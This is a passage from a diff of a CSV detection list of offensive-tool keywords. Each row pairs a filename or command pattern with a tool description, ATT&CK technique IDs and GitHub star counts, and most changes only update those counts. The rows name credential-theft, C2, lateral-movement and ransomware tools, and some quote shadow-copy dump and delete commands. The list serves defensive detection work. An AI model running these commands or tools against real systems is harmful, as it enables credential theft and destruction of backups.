TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*Wiper POC tool that wipes a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to 
bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" 
@@ -18354,7 +18542,7 @@
 "*wireless/cracker.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z"
 "*wireless/pmkid.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z"
 "*wireless/sniper.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z"
-"*wireless_attack_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
+"*wireless_attack_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
 "*wirelesskeyview.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*wirelesskeyview.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*WirelessKeyView_x64.exe*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -18362,23 +18550,23 @@
 "*wirelesskeyview-x64.zip*","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*wiresocks-main*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
 "*wiresocks-redsocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
-"*Witness.py*","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4413","812","2023-09-21T20:34:04Z","2014-02-26T16:23:25Z"
-"*WitnessMe*","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","7","688","109","2022-12-08T11:04:13Z","2019-07-06T05:25:10Z"
-"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
-"*WKL-Sec/dcomhijack*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z"
-"*WKL-Sec/HiddenDesktop*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
-"*WKL-Sec/Winsocky*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z"
+"*Witness.py*","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4415","812","2023-10-04T20:05:31Z","2014-02-26T16:23:25Z"
+"*WitnessMe*","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","7","689","109","2022-12-08T11:04:13Z","2019-07-06T05:25:10Z"
+"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*WKL-Sec/dcomhijack*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z"
+"*WKL-Sec/HiddenDesktop*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*WKL-Sec/Winsocky*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z"
 "*wkssvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
-"*WLAN-Windows-Passwords-Discord-Exfiltration*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*WLAN-Windows-Passwords-Discord-Exfiltration*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
 "*WldpBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
 "*wl-lic -d *.dat -r *.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
 "*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
-"*wmap_crawler.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*wmap_crawler.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*wmeye.csproj*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.exe *","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.sln*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" -"*Wmi_Persistence.ps1*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*wmi_persistence.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Wmi_Persistence.ps1*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*wmi_persistence.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*wmic shadowcopy call create Volume='C:\'*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic.exe* Shadowcopy Delete*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic/wmic.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" 
@@ -18387,75 +18575,75 @@ "*wmi-event-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMI-EventSub.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 
- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*wmiexec *.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*WMIExec.git*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*WMIExec.git*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - 
?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wmiexec_scheduledjob.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" -"*wmiexec_win32process.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec_scheduledjob.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec_win32process.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec2.0.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
